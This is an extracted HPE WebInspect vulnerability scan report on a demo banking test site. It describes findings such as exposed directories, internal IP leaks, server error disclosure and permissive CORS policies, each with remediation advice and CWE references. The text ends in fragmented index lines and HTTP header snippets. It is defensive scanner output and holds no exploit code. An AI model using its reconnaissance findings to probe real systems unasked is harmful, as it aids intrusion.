Notify your Security or Network Operations team of this issue.
Reference
Classifications

System Information Leak: Internal IP ( 3508 )

Summary
A string matching an internal/reserved IPv4 or IPv6 address range was discovered. This may disclose information about the IP
addressing scheme of the internal network and can be valuable to attackers.Internal IPv4/IPv6 ranges are:
10.x.x.x
172.16.x.x through 172.31.x.x
192.168.x.x
fd00::x
If not a part of techical documentation, recommendations include removing the string from the production server.
Fix
This issue can appear for several reasons. The most common is that the application or webserver error message discloses the
IP address. This can be solved by determining where to turn off detailed error messages in the application or webserver.
Another common reason is due to a comment located in the source of the webpage. This can easily be removed from the
source of the page.
Reference
Classifications

Kingdom: Encapsulation
126
Web Server Misconfiguration: Unprotected Directory ( 10210 )

Summary
Administrative directories were discovered within your web application during a Directory Enumeration scan. Risks associated
with an attacker discovering an administrative directory on your application server typically include the potential for the
attacker to use the administrative applications to affect the operations of the web site. Recommendations include restricting
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.
Implication
The primary danger from an attacker finding a publicly available directory on your web application server depends on what
type of directory it is, and what files it contains. Administrative directories typically contain applications capable of changing
the configuration of the running software; an attacker who gains access to an administrative application can drastically affect
the operation of the web site.
Fix
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.
Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro
Classifications

127
Summary
Directory Enumeration vulnerabilities were discovered within your web application. Risks associated with an attacker
discovering a directory on your application server depend upon what type of directory is discovered, and what types of files
are contained within it. The primary threat, other than accessing files containing sensitive information, is that an attacker can
utilize the information discovered in that directory to perform other types of attacks. Recommendations include restricting
Implication
The primary danger from an attacker finding a publicly available directory on your web application server depends on what
type of directory it is, and what files it contains.
Fix
For Development:
For QA:
Reference
Classifications


Summary
128
Fix
For Development:
For QA:
Reference
Classifications


Summary
Fix
For Development:
For QA:
129
Reference
Classifications


Summary
Data-related directories were discovered within your web application during a Directory Enumeration. Risks associated with an
attacker discovering a directory on your application server depend upon what type of directory is discovered, and what types
of files are contained within it. The primary threat, other than accessing files containing sensitive information, is that an
attacker can utilize the information discovered in that directory to perform other types of attacks. Recommendations include
restricting access to important directories or files by adopting a "need to know" requirement for both the document and server
root, and turning off features such as Automatic Directory Listings that provide information that could be utilized by an
attacker when formulating or conducting an attack.
Fix
For Development:
For QA:
Reference
Classifications

130

Summary
Development-related directories were discovered within your web application during a Directory Enumeration scan. Risks
associated with an attacker discovering a directory on your application server depend upon what type of directory is
discovered, and what types of files are contained within it. The primary threat, other than accessing files containing sensitive
information, is that an attacker can utilize the information discovered in that directory to perform other types of attacks.
Recommendations include removing any source code directories and repositories from the production server, disabling the use
of remote repositories, and ensuring that the latest patches and version updates have been performed on the version control
system being used Additionally, restrict access to important directories or files by adopting a "need to know" requirement for
both the document and server root, and turning off features such as Automatic Directory Listings that provide information that
could be utilized by an attacker when formulating or conducting an attack.
Execution
Browse to http://zero.webappsecurity.com:80/testing/ and inspect the content. Response should return with HTTP status code
200 and should not match target sites file not found response.
Implication
An attacker may use the internal information obtained from the source code files to craft a precise attack against the web
application. Such attacks can include, but are not limited to, SQL injection, remote file system access, malware injection and
database manipulation.
Fix
For Development:
This problem will be resolved by the web application server administrator. In general, remove all source code repositories and
files from the production server and do not rely on 'hidden' directories within the web root that can contain sensitive resources
or web applications. Assume an attacker knows about the existence of all directories and files on your web site, and protect
them with proper access controls.
For QA:
Reference
IIS Authentication
IIS Authentication
SVN
Serving websites from SVN checkout considered harmful
Subversion or CVS metadata exposure
Subversion or CVS metadata exposure
131
Classifications


Summary
Fix
For Development:
For QA:
Reference
Classifications


132

Summary
Logfile and/or statistic directories were discovered within your web application during a Directory Enumeration scan. Risks
associated with an attacker discovering a directory on your application server depend upon what type of directory is
discovered, and what types of files are contained within it. The primary threat, other than accessing files containing sensitive
information, is that an attacker can utilize the information discovered in that directory to perform other types of attacks.
Recommendations include restricting access to important directories or files by adopting a "need to know" requirement for
both the document and server root, and turning off features such as Automatic Directory Listings that provide information that
could be utilized by an attacker when formulating or conducting an attack.
Fix
For Development:
For QA:
Reference
Classifications


Summary
Directories that may be restricted to only certain users were discovered within your web application during a Directory
Enumeration scan. Risks associated with an attacker discovering a directory on your application server depend upon what type
of directory is discovered, and what types of files are contained within it. The primary threat, other than accessing files
containing sensitive information, is that an attacker can utilize the information discovered in that directory to perform other
types of attacks. Recommendations include restricting access to important directories or files by adopting a "need to know"
requirement for both the document and server root, and turning off features such as Automatic Directory Listings that provide
information that could be utilized by an attacker when formulating or conducting an attack.
Fix
133
For Development:
For QA:
Reference
Classifications


Summary
A documentation file was found. The danger in having a documentation file available is that it reveals to attackers what type
of software you are using and often the specific version information, or a location from where the attacker could download the
software itself. Recommendations include removing this file from the production server.
Execution
Open a web browser and navigate to http://zero.webappsecurity.com:80/README.txt.
Implication
The disclosed documentation may aid an attacker in attacking the server and application.
Fix
Remove documentation files from all web accessible locations, or restrict access to the files via access control mechanisms.
For Development:
Have Security Operations remove this file from the production server.
134
For QA:
Have Security Operations remove this file from the production server.
Reference
Classifications
CWE-425: Direct Request ('Forced Browsing')


Summary
A minor vulnerability has been detected within your web application due to the discovery of a fully qualified path name to the
root of your system. This most often occurs in context of an error being produced by the web application. Fully qualified
server path names allow an attacker to know the file system structure of the web server, which is a baseline for many other
types of attacks to be successful. Recommendations include adopting a consistent error handling scheme and mechanism that
prevents fully qualified path names from being displayed.
Fix
For Development:
Don't display fully qualified pathnames as part of error or informational messages. At the least, fully qualified pathnames can
provide an attacker with important information about the architecture of web application.
The following recommendations will help to ensure that a potential attacker is not deriving valuable information from any error
message that is presented.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems. Do
not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
For QA:
testing must be conducted to cause internal errors to gauge the reaction of the site.
135
which could reveal the existence of a file to an attacker? It is often a seemingly innocuous piece of information that provides
an attacker with the means to discover something else which he can then utilize when conducting an attack.
Reference
Classifications

Kingdom: Errors

Summary
A directory named 'admin' was discovered within your web application. Risks associated with an attacker discovering an
administrative directory on your application server typically include the potential for the attacker to use the administrative
applications to affect the operations of the web site. Recommendations include restricting access to important directories or
files by adopting a "need to know" requirement for both the document and server root, and turning off features such as
Automatic Directory Listings that provide information that could be utilized by an attacker when formulating or conducting an
attack.
Implication
Administrative directories typically contain applications capable of changing the configuration of the running software; an
attacker who gains access to an administrative application can drastically affect the operation of the web site.
Fix
For Development:
This problem will need to be resolved by the web application server administrator. In general, do not rely on 'hidden'
directories within the web root that can contain sensitive resources or web applications. Assume an attacker knows about the
existence of all directories and files on your web site, and protect them with proper access controls.
For QA:
Reference
136
1ea89d861eb4.mspx
Authentication, Authorization and Access Control
http://httpd.apache.org/docs/2.0/howto/auth.html
Classifications

System Information Leak: LDAP Query ( 10842 )

Summary
A possible LDAP query was discovered. This could reveal variable names, path information, and other things of value to a
potential attacker. Recommendations include not hard-coding LDAP query strings in your application code.
Implication
An attacker who discovers an LDAP query string could orchestrate more damaging attacks such as LDAP Injection which could
be utilized to retrieve information from the LDAP server.
Fix
Do not hard code LDAP query strings in your application code.
Reference
Classifications
CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
Poor Error Handling: Server Error Message ( 10932 )

137
Poor Error Handling: Server Error Message ( 10932 )

Summary
A server error response was detected. The server could be experiencing errors due to a misbehaving application, a
misconfiguration, or a malicious value sent during the auditing process. While error responses in and of themselves are not
dangerous, per se, the error responses give attackers insight into how the application handles error conditions. Errors that can
be remotely triggered by an attacker can also potentially lead to a denial of service attack or other more severe vulnerability.
Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user
input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide
information useful to an attacker from being displayed.
Implication
The server has issued a 500 error response. While the body content of the error page may not expose any information about
the technical error, the fact that an error occurred is confirmed by the 500 status code. Knowing whether certain inputs
trigger a server error can aid or inform an attacker of potential vulnerabilities.
Fix
Server error messages, such as "File Protected Against Access", often reveal more information than intended. For instance, an
attacker who receives this message can be relatively certain that file exists, which might give him the information he needs to
pursue other leads, or to perform an actual exploit. The following recommendations will help to ensure that a potential
attacker is not deriving valuable information from any server error message that is presented.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems. Do
not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
Removing Detailed Error Messages
Find instructions for turning off detailed error messaging in IIS at this link:
http://support.microsoft.com/kb/294807
For Development:
From a development perspective, the best method of preventing problems from arising from server error messages is to adopt
secure programming techniques that prevent problems that might arise from an attacker discovering too much information
about the architecture and design of your web application. The following recommendations can be used as a basis for that.
Stringently define the data type (for instance, a string, an alphanumeric character, etc) that the application will accept.
Use what is good instead of what is bad. Validate input for improper characters.
Do not display error messages to the end user that provide information (such as table names) that could be utilized in
Define the allowed set of characters. For instance, if a field is to receive a number, only let that field accept numbers.
Define the maximum and minimum data lengths for what the application will accept.
Specify acceptable numeric ranges for input.
138
For QA:
which could reveal the existence of a file to an attacker? Inconsistent methods of dealing with errors gives an attacker a very
powerful way of gathering information about your web application.
Reference
Apache:
Security Tips for Server Configuration
Protecting Confidential Documents at Your Site
Securing Apache - Access Control
Microsoft:
How to set required NTFS permissions and user rights for an IIS 5.0 Web server
Default permissions and user rights for IIS 6.0
Description of Microsoft Internet Information Services (IIS) 5.0 and 6.0 status codes
Classifications
CWE-388: Error Handling

CWE-497: Exposure of System Data to an Unauthorized Control Sphere
Kingdom: Errors
HTML5: Overly Permissive CORS Policy ( 11279 )

Summary
A resource on the target website has been found to be shared across websites using CORS with an open access control policy.
Cross-Origin Resource Sharing, commonly referred to as CORS, is a technology that allows a domain to define a policy for its
resources to be accessed by a web page hosted on a different domain using cross domain XML HTTP Requests (XHR).
Historically, the browser restricts cross domain XHR requests to abide by the same origin policy. At its basic form, the same
origin policy sets the script execution scope to the resources available on the current domain and prohibits any communication
to domains outside this scope. While CORS is supported on all major browsers, it also requires that the domain correctly
defines the CORS policy in order to have its resources shared with another domain. These restrictions are managed by access
policies typically included in specialized response headers, such as:
Access-Control-Allow-Origin
Access-Control-Allow-Headers
Access-Control-Allow-Methods
A domain includes a list of domains that are allowed to make cross domain requests to shared resources in Access-ControlAllow-Origin header. This header can have either list of domains or a wildcard character (*) to allow all access. Having a
wildcard is considered overly permissive policy.
139
Implication
An overly permissive CORS policy can allow a malicious application to communicate with the victim application in an
inappropriate way, leading to spoofing, data theft, relay and other attacks. It can open possibilities for entire domain
compromise. For example, lets say a Resource is located on a private intranet and a universal access policy is created with
the intent that only other intranet domains can reach it. Subsequently, an internal employee browses to an Internet resource
that includes a malicious embedded JavaScript that enumerates the private resource and enables external accessibility;
effectively exposing it to the Internet. If the resource discloses any sensitive information, this attack can quickly escalate into
an unintentional breach of sensitive information.
Fix
Review your Cross-Origin-Resource-Sharing policy and consider restricting access to only trusted domains. Never use wildcard
open-access permissions (e.g. *) in the Access-Control-Allow-Origin header. Additionally, do not automatically include Access
-Control-Allow-Origin headers in the response unless the request is cross-domain. Alternatively, implement a whitelist of
known domains that are allowed to access this domain and only include domains that actually tried to access the resource.
Otherwise, reject the request and reply with only host domain not exposing all allowed domains. Reserve the use of CORS for
resources that cannot be shared in other ways (e.g. JavaScript can be accessed using SCRIPT tag as well as images can be
accessed using IMG tag from other domains). Finally, make sure that this resource does not disclose any sensitive information
and only share resources required to preserve functionality in contrast to an open domain CORS access.
Example 1:
An example of IIS server configuration for listing domains the application is allowed to communicate with.
<configuration>
<system.webServer>
<httpProtocol>
<customHeaders>
u160?
<add name="Access-Control-Allow-Origin" value="www.trusted.com" />
</customHeaders>
</httpProtocol>
</system.webServer>
</configuration>
Example 1 shows how to configure CORS headers at the server level; however, the preferred method is to make use of the
API of the language used to develop the application and set access permissions at the resource level.
Here are some programmatic samples by language:
.NET:
Append Header:
Response.AppendHeader("Access-Control-Allow-Origin", "www.trusted.com");
Check for cross domain XHR request:
if((Request.Headers["X-Requested-With"] == "XMLHttpRequest") && Request.Headers[Origin] != null))
Java:
response.addHeader("Access-Control-Allow-Origin", "www.trusted.com");
check for cross domain XHR request:
if((request.getHeader("X-Requested-With") == "XMLHttpRequest") && request.getHeader("Origin")!= null))
PHP:
header('Access-Control-Allow-Origin: www.trusted.com');
?>
Check for cross domain XHR request:
If( isset($_SERVER['HTTP_X_REQUESTED_WITH']) && ($_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest')
&& isset($_SERVER[Origin]))
Reference
OWASP HTML 5 Security Cheat Sheet
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Cross-Origin Resource Sharing
http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
140
http://www.w3.org/TR/cors/
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
Classifications
CWE-708: Incorrect Ownership Assignment

Web Server Misconfiguration: Insecure Content-Type Setting ( 11309 )

Summary
Almost all browsers are designed to use a mime sniffing technique to guess the content type of the HTTP response instead of
adhering to the Content-Type specified by the application in specific cases or ignoring the content when no mime type is
specified. Inconsistencies introduced by the mime sniffing techniques could allow attackers to conduct Cross-Site Scripting
attacks or steal sensitive user data. WebInspect has determined that the application fails to instruct the browser to strictly
enforce the Content-Type specification supplied in the response.
Web server misconfiguration can cause an application to send HTTP responses with the missing Content-Type header or
specify a mime type that does not match up accurately with the response content. When a browser receives such a response,
it attempts to programmatically determine the mime type based on the content returned in the response. The mime type
derived by the browser, however, might not accurately match the one intended by the application developer. Such
inconsistencies have historically allowed attackers to conduct Cross-Site Scripting or data theft using Cascading Style Sheets
(CSS) by letting them bypass server-side filters using mime type checking and yet have the malicious payload with misleading
mime type specification executed on the client-side due to the browser mime sniffing policies.
Microsoft Internet Explorer (IE) introduced the X-Content-Type-Options: nosniff specification that application developers can
include in all responses to ensure that mime sniffing does not occur on the client-side. This protection mechanism is limited to
Microsoft Internet Explorer versions 9 and above.
Execution
. Build a test page that includes a reference to an external JavaScript or CSS resource
. Configure the server to return the external resource with an incorrect mime type specification
. Visit the test page using an old version of Microsofts Internet Explorer (version IE 8) browser
. Interpretation of the external content as JavaScript or CSS by the browser despite the misleading mime type specification
indicates a potential for compromise.
Implication
By failing to dictate the suitable browser interpretation of the response content, application developers can expose their users
to Cross-Site Scripting or information stealing attacks.
141
Fix
Configure the web server to always send the X-Content-Type-Options: nosniff specification in the response headers. In
addition, ensure that following safety precautions are also put in place:
. Verify that the web server configuration will send the accurate mime type information in the Content-Type header of each
HTTP response
. Configure the server to send a default Content-Type of text-plain or application/octet-stream to tackle failure scenarios
. Ensure that appropriate Character Set is specified in the Content-Type header
. Configure the server to send Content-Disposition: attachment; filename=name; for content without an explicit content type
specification.
Reference
Microsoft Internet Explorer:
MIME-Handling Change: X-Content-Type-Options: nosniff
MIME-Handling Changes in Internet Explorer
OWASP:
OWASP Testing Guide Appendix D: Encoded Injection
List of Useful HTTP Headers
CSS Data Theft:
CVE-2010-0654
Classifications
Insecure Deployment: Known Application Fingerprint ( 3872 )

Summary
The Ws_ftp.log parser engine will parse any Ws_ftp.log files found within the scan for links to add to the crawler engine.
Fix
142
Reference
Classifications
Web Server Misconfiguration: OPTIONS HTTP Method ( 10282 )

Summary
The server supports the OPTIONS HTTP method. The OPTIONS method is used to determine what other methods the server
supports for a given URI/resource.
Fix
Reference
RFC 2616 Section 9: HTTP Methods:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
Apache:
Apache HTTP Server Version 2.0
Apache HTTP Server Version 1.3
Microsoft:
UrlScan Security Tool
How to configure the URLScan Tool
Setting Application Mappings in IIS 6.0
Classifications

143
Compliance Failure: Missing Privacy Policy ( 5546 )

Summary
A privacy policy was not supplied by the web application within the scope of this audit. Many legislative initiatives require that
organizations place a publicly accessible document within their web application that defines their websites privacy policy. As a
general rule, these privacy policies must detail what information an organization collects, the purpose for collecting it,
potential avenues of disclosure, and methods for addressing potential grievances.
Various laws governing privacy policies include the Gramm-Leach-Bliley Act, Health Insurance Portability and Accountability
Act (HIPAA), the California Online Privacy Protection Act of 2003, European Union's Data Protection Directive and others.
Execution
All of the web pages accessible within the scope of the scan are sampled for textual content that often constitutes a privacy
policy statement. A violation is reported upon completion of the web application crawl without a successful match against any
of the web pages.
Note that the privacy policy of your application could be located on another host or within a section of the site that was not
configured as part of the scan. To validate, please try to access the privacy policy of your website and check to see if it was
part of the scan.
The content of the following resources requires manual inspection to verify if it comprises the privacy policy statement.
Implication
Most privacy laws are created to protect residents who are users of the website. Hence, organizations from any part of the
world must adhere to these laws if they cater to customers residing in these geographical areas. Failing to do so could result
in a lawsuit by the corresponding government against the organization.
Fix
Declare a comprehensive privacy policy for the website, and ensure that it is accessible from every page that seeks personal
information from users. To verify the fix, rescan the site in order to discover and audit the newly added resources.
Descriptions:
Any standard web application privacy policy should include the following components:
A description of the intended purpose for collecting the data.

A description of the use of the data.
Methods for limiting the use and disclosure of the information.
A list of the types of third parties to whom the information might be disclosed.
Contact information for inquires and complaints.
Reference
California Online Privacy Protection Act
http://oag.ca.gov/privacy/COPPA
National Conference of State Legislation
http://www.ncsl.org/issues-research/telecom/state-laws-related-to-internet-privacy.aspx
Gramm-Leach-Bliley Act
http://www.gpo.gov/fdsys/pkg/PLAW-106publ102/pdf/PLAW-106publ102.pdf
Health Insurance Portability and Accountability Act of 1996
https://www.cms.gov/Regulations-and-Guidance/HIPAA-Administrative-Simplification/HIPAAGenInfo/downloads/HIPAALaw.pdf
Health Insurance Portability and Accountability Act of 1996
http://ec.europa.eu/justice/policies/privacy/docs/guide/guide-ukingdom_en.pdf
Classifications

144
CWE-254: Security Features
Privacy Violation: Autocomplete ( 5597 )

Summary
Most recent browsers have features that will save form field content entered by users and then automatically complete form
entry the next time the fields are encountered. This feature is enabled by default and could leak sensitive information since it
is stored on the hard drive of the user. The risk of this issue is greatly increased if users are accessing the application from a
shared environment. Recommendations include setting autocomplete to "off" on all your forms.
Fix
Reference
Microsoft:
Autocomplete Security
Classifications

HTML5: CORS Functionality Abuse ( 11282 )

Summary
A resource has been discovered that is shared using cross domain access with CORS that can be accessed using more secure
alternatives. For example, JavaScript can be accessed using the SCRIPT tag and, similarly, the IMG tag can be used to access
images and the IFRAME tag can be used to include html content.
Cross-Origin Resource Sharing, commonly referred to as CORS, is a technology that allows a domain to define a policy for its
resources to be accessed by a web page hosted on a different domain using cross domain XML HTTP Requests (XHR).
Historically, the browsers have restricted XHR requests to abide by the same origin policy. This policy sets the script execution
scope to the resources available on the current domain and prohibits any communication to domains outside this scope.
However, a few HTML tags, such as SCRIPT, IMG, and IFRAME, are exempt from the same origin policy and allow remote
content to be loaded from a different domain. These are secure alternatives for the site that loads contents from remote
domain and no special permission or cross-domain policy is required from hosting domain.
While CORS is supported on all major browsers, it also requires that the domain correctly defines the CORS policy in order to
have its resources shared with another domain. These restrictions are managed by access policies typically communicated in
145
have its resources shared with another domain. These restrictions are managed by access policies typically communicated in
specialized response headers, such as:
Access-Control-Allow-Origin
Access-Control-Allow-Headers
Access-Control-Allow-Methods
However, caution should be taken when defining these headers because an overly permissive policy configured at server level
for domain or directory on a domain can open more content for cross domains access than intended. CORS can allow a
malicious application to communicate with victim application in an inappropriate way leading to information disclosure,
spoofing, data theft, relay or other attacks.Implementing CORS can increase an applications attack surface tremendously and
should be used only when absolutely necessary.
Fix
Revisit the currently implemented CORS policy and restrict sharing to only type of content that can not be shared using
alternate mechanisms. In addition, isolate CORS-enabled resources on the webserver and create a publicly accessible directory
for sharing JavaScript or image content types. Finally, instead of including list of all allowed domains in response AccessControl-Allow-Origin header, include only the domain trying to access contents.
Reference
OWASP HTML 5 Security Cheat Sheet
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Cross-Origin Resource Sharing
http://www.w3.org/TR/cors/
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
Classifications
CWE-227: Improper Fulfillment of API Contract ('API Abuse')

Web Server Misconfiguration: Insecure Content-Type Setting ( 11359 )

Summary
The Content-Type HTTP response header or the HTML meta tag provides a mechanism for the server to specify an
appropriate character encoding for the response content to be rendered in the web browser. Proper specification of the
character encoding through the charset parameter in the Content-Type field reduces the likelihood of misinterpretation of the
characters in the response content and ensure reliable rendering of the web page.Failure to ensure enforcement of the
desired character encoding could result in client-side attacks like Cross-Site Scripting.
Execution
Verify the character set specification on every HTTP response. Character sets can be specified in the HTTP header or in an
HTML meta tag. In the case of an XML response, the character set can be specified along with the XML Declaration.
Implication
In the absence of the character set specification, a user-agent might default to a non-standard character set, or could derive
an incorrect character set based on certain characters in the response content. In some cases, both these approaches can
cause the response to be incorrectly rendered. This may enable other attacks such as Cross-site Scripting.
146
cause the response to be incorrectly rendered. This may enable other attacks such as Cross-site Scripting.
Fix
Ensure that a suitable character set is specified for every response generated by the web application. This can be done either
by,
Modifying the code of the web application, which would require all pages to be modified.
Adding Content-Type header to the server configuration (recommended). This ensures that the header is added to all
the responses with minimal development effort.
Reference
DoD Application Security and Development STIG
http://iase.disa.mil/stigs/app_security/app_sec/app_sec.html
UTF-7 encoding used to create XSS attack
http://www.securityfocus.com/archive/1/420001
Classifications

147

Duplicates

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Duplicates

Hochgeladen von

Copyright:

Verfügbare Formate

HPE Security WebInspect

Cross-Site Scripting: Reflected

Cross-Site Scripting: Reflected

Report Date: 10/10/2016

Privacy Violation: Social Security Number

Web Server Misconfiguration: Unprotected File

GET /faq.html.bak HTTP/1.1

Web Server Misconfiguration: Unprotected File

Web Server Misconfiguration: Unprotected File

Report Date: 10/10/2016

X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="eef16f07-aaef-4645-902f-44780fdf1682";

Web Server Misconfiguration: Unprotected File

Web Server Misconfiguration: HTTP Basic Authentication

Date: Mon, 10 Oct 2016 07:51:12 GMT

Often Misused: Login

Cache-Control: no-cache, max-age=0, must-revalidate, no-store

Expression Language Injection

Web Server Misconfiguration: Unprotected File

B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html

Report Date: 10/10/2016

Cross-Site Scripting: Reflected

Web Server Misconfiguration: Unprotected File

Report Date: 10/10/2016

Insecure Deployment: Unpatched Application

<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>

Report Date: 10/10/2016

Date: Mon, 10 Oct 2016 07:52:14 GMT

Report Date: 10/10/2016

This will significantly impact startup time of applications,

Date: Mon, 10 Oct 2016 07:53:10 GMT

X-Request-Memo: ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf"; sc="1"; ThreadId="97";

Report Date: 10/10/2016

Web Server Misconfiguration: Unprotected File

System Information Leak: Internal IP

Report Date: 10/10/2016

X-Request-Memo: ID="7fb39035-d4ae-41aa-a0e7-7b0907724343"; sc="1"; ThreadId="97";

Report Date: 10/10/2016

X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="133118b0-4eff-49e5-b4ad-6236be637206";

Web Server Misconfiguration: Unprotected Directory

Accept-Encoding: gzip, deflate

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Report Date: 10/10/2016

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected Directory

Report Date: 10/10/2016

X-Scan-Memo: Category="Audit.Attack"; SID="0036DDD44B029BA89605F462C087D6CD";

Web Server Misconfiguration: Unprotected Directory

Web Server Misconfiguration: Unprotected File

Poor Error Handling: Unhandled Exception

Report Date: 10/10/2016

<div class="codeBox"><pre><code>set CATALINA_BASE=c:\tomcat_7\instances\instance2

Web Server Misconfiguration: Unprotected Directory

Report Date: 10/10/2016

System Information Leak: LDAP Query

Poor Error Handling: Server Error Message

HTML5: Overly Permissive CORS Policy

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {

table.defaultTable tr, table.detail-table tr {

PSID="5BE22692ADEF2CF19E101E8F2AE21ECC"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";